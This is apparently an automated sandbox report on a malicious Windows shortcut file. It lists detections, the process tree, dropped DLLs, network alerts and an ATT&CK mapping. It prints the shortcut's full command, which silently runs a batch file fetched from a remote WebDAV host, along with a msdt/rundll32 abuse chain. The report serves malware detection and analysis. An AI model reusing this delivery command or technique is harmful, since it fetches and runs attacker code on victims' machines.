Edit tour

Windows Analysis Report
dial2.Ink.lnk

Overview

General Information

Sample name:	dial2.Ink.lnk
Analysis ID:	1447085
MD5:	e12f74c1f35c4f7d07f5615757729526
SHA1:	809096004d6255f491f6d477d94d72bd46b9e023
SHA256:	d577c12707f3c3c4aed546e08525caf2e24c4cebc8ab1658c6d870c09177bcbf
Tags:	lnk
Infos:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Windows shortcut file (LNK) starts blacklisted processes

Found URL in windows shortcut file (LNK)

Machine Learning detection for sample

Opens network shares

Uses netsh to modify the Windows network and firewall settings

Binary contains a suspicious time stamp

Creates a process in suspended mode (likely to inject code)

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Use Short Name Path in Command Line

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6704 cmdline: "C:\Windows\System32\cmd.exe" /c start "" /min \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\file.bat & start \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\1.jpg MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rundll32.exe (PID: 7496 cmdline: "C:\Windows\system32\rundll32.exe" ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile NetworkDiagnosticsSharing C:\Users\user~1\AppData\Local\Temp\NDF1936.tmp MD5: EF3179D498793BF4234F708D3BE28633)

msdt.exe (PID: 7516 cmdline: -skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\user~1\AppData\Local\Temp\NDF1936.tmp" -ep "NetworkDiagnosticsSharing" MD5: 3AE6BFDF0257B303EDD695DA183C8462)

netsh.exe (PID: 7856 cmdline: "C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cleanup

Sigma Signatures

System Summary

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\system32\rundll32.exe" ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile NetworkDiagnosticsSharing C:\Users\user~1\AppData\Local\Temp\NDF1936.tmp, CommandLine: "C:\Windows\system32\rundll32.exe" ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile NetworkDiagnosticsSharing C:\Users\user~1\AppData\Local\Temp\NDF1936.tmp, CommandLine|base64offset|contains: 5p'brj, Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start "" /min \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\file.bat & start \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\1.jpg, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6704, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile NetworkDiagnosticsSharing C:\Users\user~1\AppData\Local\Temp\NDF1936.tmp, ProcessId: 7496, ProcessName: rundll32.exe

Snort Signatures

ET TROJAN DNS Query to Malware Delivery Related Domain (boy-such-icon-positive .trycloudflare .com) - Source IP: 192.168.2.7 - Destination IP: 1.1.1.1

Timestamp:	05/24/24-11:03:00.227669
SID:	2052731
Source Port:	50669
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for domain / URL

Source: boy-such-icon-positive.trycloudflare.com

Virustotal: Detection: 5%

Perma Link

Multi AV Scanner detection for submitted file

Source: dial2.Ink.lnk

Virustotal: Detection: 9%

Perma Link

Machine Learning detection for sample

Source: dial2.Ink.lnk

Joe Sandbox ML: detected

Source:

Binary string: NetworkDiagnosticSnapIn.pdb source: NetworkDiagnosticSnapIn.dll.13.dr

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2052731 ET TROJAN DNS Query to Malware Delivery Related Domain (boy-such-icon-positive .trycloudflare .com) 192.168.2.7:50669 -> 1.1.1.1:53

Source: unknown

DNS traffic detected: query: boy-such-icon-positive.trycloudflare.com replaycode: Name error (3)

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: boy-such-icon-positive.trycloudflare.com

Source: msdt.exe, 0000000D.00000002.3680506745.00000198C6CBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: msdt.exe, 0000000D.00000003.1361418548.00000198C6CDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: dial2.Ink.lnk	String found in binary or memory: https://pizza-practices-representative-country.trycloudflare.com
Source: dial2.Ink.lnk	String found in binary or memory: https://pizza-practices-representative-country.trycloudflare.com.Z2

System Summary

Found URL in windows shortcut file (LNK)

Source: Initial file

Strings: https://pizza-practices-representative-country.trycloudflare.com.Z2SXT=

Source: DiagPackage.dll.13.dr	Static PE information: No import functions for PE file found
Source: DiagPackage.dll.mui.13.dr	Static PE information: No import functions for PE file found

Source: classification engine

Classification label: mal88.rans.spyw.evad.winLNK@7/16@1/0

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user~1\AppData\Local\Temp\NDF1936.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" /min \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\file.bat & start \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\1.jpg

Source: C:\Windows\System32\cmd.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\TenantRestrictions\Payload

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile NetworkDiagnosticsSharing C:\Users\user~1\AppData\Local\Temp\NDF1936.tmp

Source: dial2.Ink.lnk

Virustotal: Detection: 9%

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" /min \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\file.bat & start \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\1.jpg
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile NetworkDiagnosticsSharing C:\Users\user~1\AppData\Local\Temp\NDF1936.tmp
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\msdt.exe -skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\user~1\AppData\Local\Temp\NDF1936.tmp" -ep "NetworkDiagnosticsSharing"
Source: unknown	Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile NetworkDiagnosticsSharing C:\Users\user~1\AppData\Local\Temp\NDF1936.tmp	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\msdt.exe -skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\user~1\AppData\Local\Temp\NDF1936.tmp" -ep "NetworkDiagnosticsSharing"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: networkexplorer.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ndfapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wdi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ndfapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wdi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettraceex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ndfapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wdi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Windows\System32\msdt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32

Jump to behavior

Source: dial2.Ink.lnk

LNK file: ..\..\..\..\Windows\System32\cmd.exe

Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next

Source: C:\Windows\System32\msdt.exe

File opened: C:\Windows\system32\MSFTEDIT.DLL

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:

Binary string: NetworkDiagnosticSnapIn.pdb source: NetworkDiagnosticSnapIn.dll.13.dr

Source: DiagPackage.dll.13.dr

Static PE information: 0xB6DD46AC [Mon Mar 21 17:41:00 2067 UTC]

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file

Process created: C:\Windows\System32\cmd.exe

Source: C:\Windows\System32\msdt.exe	File created: C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticSnapIn.dll	Jump to dropped file
Source: C:\Windows\System32\msdt.exe	File created: C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\DiagPackage.dll	Jump to dropped file
Source: C:\Windows\System32\msdt.exe	File created: C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\en-GB\DiagPackage.dll.mui	Jump to dropped file

Source: C:\Windows\System32\msdt.exe	File created: C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticSnapIn.dll	Jump to dropped file
Source: C:\Windows\System32\msdt.exe	File created: C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\DiagPackage.dll	Jump to dropped file
Source: C:\Windows\System32\msdt.exe	File created: C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\en-GB\DiagPackage.dll.mui	Jump to dropped file

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msdt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msdt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msdt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msdt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\msdt.exe	Window / User API: threadDelayed 995			Jump to behavior
Source: C:\Windows\System32\msdt.exe	Window / User API: threadDelayed 4096			Jump to behavior

Source: C:\Windows\System32\msdt.exe	Dropped PE file which has not been started: C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\NetworkDiagnosticSnapIn.dll	Jump to dropped file
Source: C:\Windows\System32\msdt.exe	Dropped PE file which has not been started: C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\DiagPackage.dll	Jump to dropped file
Source: C:\Windows\System32\msdt.exe	Dropped PE file which has not been started: C:\Windows\Temp\SDIAG_46a43649-8c6f-48fb-bd76-6a23fa82897f\en-GB\DiagPackage.dll.mui	Jump to dropped file

Source: C:\Windows\System32\cmd.exe TID: 6580

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: netsh.exe, 00000011.00000003.1469028568.0000029DB9D35000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000011.00000003.1469259123.0000029DB9D38000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\cmd.exe

Jump to behavior

Source: C:\Windows\System32\msdt.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0316~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Windows\System32\msdt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: unknown

Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter

Stealing of Sensitive Information

Opens network shares

Source: C:\Windows\System32\cmd.exe	File opened: \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Network Share Discovery	Remote Services	Data from Local System	1 Non-Application Layer Protocol	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Rundll32	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	12 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
